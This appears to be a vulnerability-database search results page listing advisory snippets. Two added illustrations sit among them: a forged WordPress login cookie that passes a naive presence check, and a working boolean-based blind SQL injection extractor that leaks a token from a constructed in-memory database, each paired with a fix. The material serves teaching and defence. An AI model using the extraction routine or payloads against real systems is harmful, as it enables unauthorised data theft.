18 matches found
EUVD-2026-33248
The Breeze plugin for WordPress is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor in all versions up to, and including, 2.5.2. This is due to improper verification of the wordpress_logged_in cookie in the inc/cache/execute-cache.php file when the "Cache Logged-in Users"...
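The failure pattern behind that entry is a cache layer that decides "this visitor is logged in" from the mere presence of a login cookie instead of validating it, so an anonymous request that sets a cookie of the right name is served the cache bucket built for authenticated users. The block below is an added illustration and not Breeze's code: it uses a simplified signed cookie (`user|expiry|HMAC`) with a constructed server secret, whereas the real WordPress cookie also carries a session token and per-user key material; the cookie name prefix `wordpress_logged_in` and the two-bucket cache model are assumptions for the example.

```python
import hashlib
import hmac
import time
from typing import Optional

# Assumption for this example: a server-side secret standing in for the site's
# auth keys and salts. Never hard-code a real one.
SERVER_SECRET = b"constructed-example-secret"


def make_cookie(user: str, expires: int, secret: bytes = SERVER_SECRET) -> str:
    """Mint a signed login cookie value of the form user|expiry|HMAC(user|expiry)."""
    payload = f"{user}|{expires}"
    tag = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{tag}"


def is_logged_in_naive(cookies: dict, now: Optional[int] = None) -> bool:
    """Weak check: any cookie whose name starts with the login prefix counts.
    The client controls cookie names, so this proves nothing about the visitor."""
    return any(name.startswith("wordpress_logged_in") for name in cookies)


def is_logged_in_verified(cookies: dict, now: Optional[int] = None,
                          secret: bytes = SERVER_SECRET) -> bool:
    """Proper check: the cookie must carry a signature that verifies under the
    server secret and an expiry that has not passed."""
    now = int(time.time()) if now is None else now
    for name, value in cookies.items():
        if not name.startswith("wordpress_logged_in"):
            continue
        parts = value.split("|")
        if len(parts) != 3:
            continue
        user, expires, tag = parts
        if not expires.isdigit() or int(expires) < now:
            continue
        expected = hmac.new(secret, f"{user}|{expires}".encode(),
                            hashlib.sha256).hexdigest()
        # constant-time comparison so the tag check itself is not an oracle
        if hmac.compare_digest(expected, tag):
            return True
    return False


def cache_bucket(cookies: dict, checker, now: Optional[int] = None) -> str:
    """Decide which cache the request is served from when logged-in caching is on.
    `checker` is one of the two functions above."""
    return "logged-in" if checker(cookies, now) else "anonymous"


if __name__ == "__main__":
    now = 1_700_000_000
    forged = {"wordpress_logged_in_abc": "alice|9999999999|deadbeef"}
    print("naive:", cache_bucket(forged, is_logged_in_naive, now))        # logged-in
    print("verified:", cache_bucket(forged, is_logged_in_verified, now))  # anonymous
```

The forged cookie passes the naive check and lands the attacker in the logged-in cache; under the verified check the same request is treated as anonymous, and a cookie whose user field has been edited or whose expiry has passed is rejected as well.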
Nucleus Security vs Hive Pro: CTEM Comparison
Choosing between Nucleus Security vs Hive Pro is really a decision about how your security team wants to run exposure management: as an aggregation and workflow layer over existing tools, or as a broader CTEM platform that combines aggregation, native discovery, threat intelligence, validation, a...
pdfmake Security Vulnerability
pdfmake is a pure JavaScript PDF document generation library for server-side and client-side use, developed by Bartek Pampuch. Versions 0.3.0-beta.2 through 0.3.5 of pdfmake contain a security vulnerability that stems from the src/URLResolver.js component's server-side request forgery vulnerabilit...
CVE-2025-27899
IBM DB2 Recovery Expert for LUW 5.5 Interim Fix 002 discloses sensitive information in an environment variable that could aid in further attacks against the system...
Edimax EW-7438RPn-v3 Mini Security Vulnerability
The Edimax EW-7438RPn-v3 Mini is a mini wireless signal extender produced by Edimax of Taiwan. Version 1.27 of the Edimax EW-7438RPn-v3 Mini contains a security vulnerability that allows unauthenticated attackers to access the /wizardreboot.asp page, potentially leading to the...
EUVD-2022-6802
Malicious code in bioql PyPI...
EUVD-2025-17753
Malicious code in bioql PyPI...
PT-2025-33747
Name of the Vulnerable Software and Affected Versions: EzGED3 versions prior to 3.5.72.27183 Description: EzGED3 is susceptible to an unauthenticated arbitrary file read issue stemming from inadequate access control and insufficient input validation within a web-accessible script. An attacker can...
CVE-2025-50341
A Boolean-based SQL injection vulnerability was discovered in Axelor 5.2.4 via the domain parameter. An attacker can manipulate the SQL query logic and determine true/false conditions, potentially leading to data exposure or further exploitation...
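A Boolean-based injection of the kind described there is usually exploited as a blind oracle: the attacker cannot see query output, only whether the request matched something, and turns that one bit into a character-by-character read of any value the database can reach. The block below is an added example, not Axelor's code or schema: it builds a constructed SQLite database in memory, concatenates a `domain` parameter into a query the way a vulnerable handler would, drives the resulting true/false oracle to recover a secret, and shows the bound-parameter version of the same lookup on which the payload is inert. The table and column names and the secret value are assumptions for the example, and the technique generalises to any filter parameter spliced into a query string.

```python
import sqlite3
import string


def build_db() -> sqlite3.Connection:
    """Constructed in-memory data store for the example (not a real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE site (id INTEGER PRIMARY KEY, domain TEXT)")
    conn.execute("CREATE TABLE config (name TEXT, val TEXT)")
    conn.executemany("INSERT INTO site(domain) VALUES (?)",
                     [("example.test",), ("intranet.test",)])
    conn.execute("INSERT INTO config VALUES ('api_token', 'tok_9f3a')")
    conn.commit()
    return conn


DB = build_db()


def site_exists_vulnerable(domain: str) -> bool:
    """Vulnerable lookup: the parameter is spliced into the SQL text, so an
    attacker can append conditions. The caller only learns matched / not matched."""
    sql = f"SELECT id FROM site WHERE domain = '{domain}'"
    return DB.execute(sql).fetchone() is not None


def site_exists_safe(domain: str) -> bool:
    """Fixed lookup: the value is bound as a parameter and can never alter
    the query structure, so injected SQL is just an unmatched string."""
    row = DB.execute("SELECT id FROM site WHERE domain = ?", (domain,)).fetchone()
    return row is not None


ALPHABET = string.ascii_letters + string.digits + "_"


def blind_extract(oracle, subquery: str, max_len: int = 32) -> str:
    """Boolean-based blind extraction: one true/false question per character.
    `oracle` is any function that takes the parameter value and returns a bool;
    `subquery` must evaluate to a single string (e.g. a SELECT of one column)."""
    recovered = ""
    for pos in range(1, max_len + 1):
        # length probe: stop once position `pos` lies beyond the end of the value
        if not oracle(f"example.test' AND length(({subquery})) >= {pos} -- "):
            break
        for ch in ALPHABET:
            payload = (f"example.test' AND substr(({subquery}), {pos}, 1) = '{ch}' -- ")
            if oracle(payload):
                recovered += ch
                break
        else:
            raise ValueError(f"no character in alphabet matched at position {pos}")
    return recovered


TOKEN_QUERY = "SELECT val FROM config WHERE name = 'api_token'"

if __name__ == "__main__":
    print("leaked via vulnerable handler:", blind_extract(site_exists_vulnerable, TOKEN_QUERY))
    print("same payload on safe handler:", site_exists_safe("x' OR 1=1 -- "))
```

Each oracle call only answers "did a row match", yet `blind_extract` recovers the token in a number of requests linear in its length times the alphabet size; against the parameterised lookup the same payloads are compared literally as a domain name and never match.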
CVE-2025-49142
CVE-2025-49142 affects Nautobot prior to 2.4.10 and prior to 1.6.32. The issue arises from misconfigurations in the Jinja2 templating used in computed fields, custom links, etc., allowing a malicious user to expose secret values or to invoke Python APIs to modify data when templated content is re...
PT-2024-27523
Name of the Vulnerable Software and Affected Versions: No specific software or versions are mentioned. Description: The issue concerns an IDOR vulnerability. There is no information provided about the estimated number of potentially affected devices worldwide or details about real-world incidents...
CVE-2024-25635 IDOR Vulnerability: Allowing Organization Owner to view the other Organizations API KEY and USERS
alf.io is an open source ticket reservation system. Prior to version 2.0-Mr-2402, organization owners can view the generated API KEY and USERS of other organization owners using the http://192.168.26.128:8080/admin/api/users/ endpoint, which exposes the details of the provided user ID. This may...
m2crypto Bleichenbacher timing attack - incomplete fix for CVE-2020-25657
A flaw was found in m2crypto. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data...
PT-2024-15017
Name of the Vulnerable Software and Affected Versions: FastDup WordPress plugin versions prior to 2.2 Description: The issue concerns the FastDup WordPress plugin, which does not prevent directory listing in sensitive directories containing export files. This could potentially expose sensitive...
CVE-2022-0594
The Professional Social Sharing Buttons, Icons & Related Posts WordPress plugin before 9.7.6 does not have a proper authorisation check in one of its AJAX actions, available to unauthenticated users in v9.7.5 and to author+ users in v9.7.5, allowing them to call it and retrieve various information such as t...
Information Disclosure Vulnerability in Jazz Foundation in Multiple IBM Products
IBM Rational Collaborative Lifecycle Management (CLM), Rational Team Concert (RTC) and Rational Engineering Lifecycle Manager (RELM) are products of IBM Corporation of the United States. They are all collaborative...
Lost BP Laptop Contains Financial Information on Thousands of Gulf Oil Spill Victims
Almost a year has passed since the Deepwater Horizon oil rig exploded and spewed three months of oil into the Gulf of Mexico. But less than six months after the beleaguered oil giant managed to cap that well, it is contending with a new spill of a different sort: the loss of personal information ...
ATA-186 Password Disclosure Vulnerability
...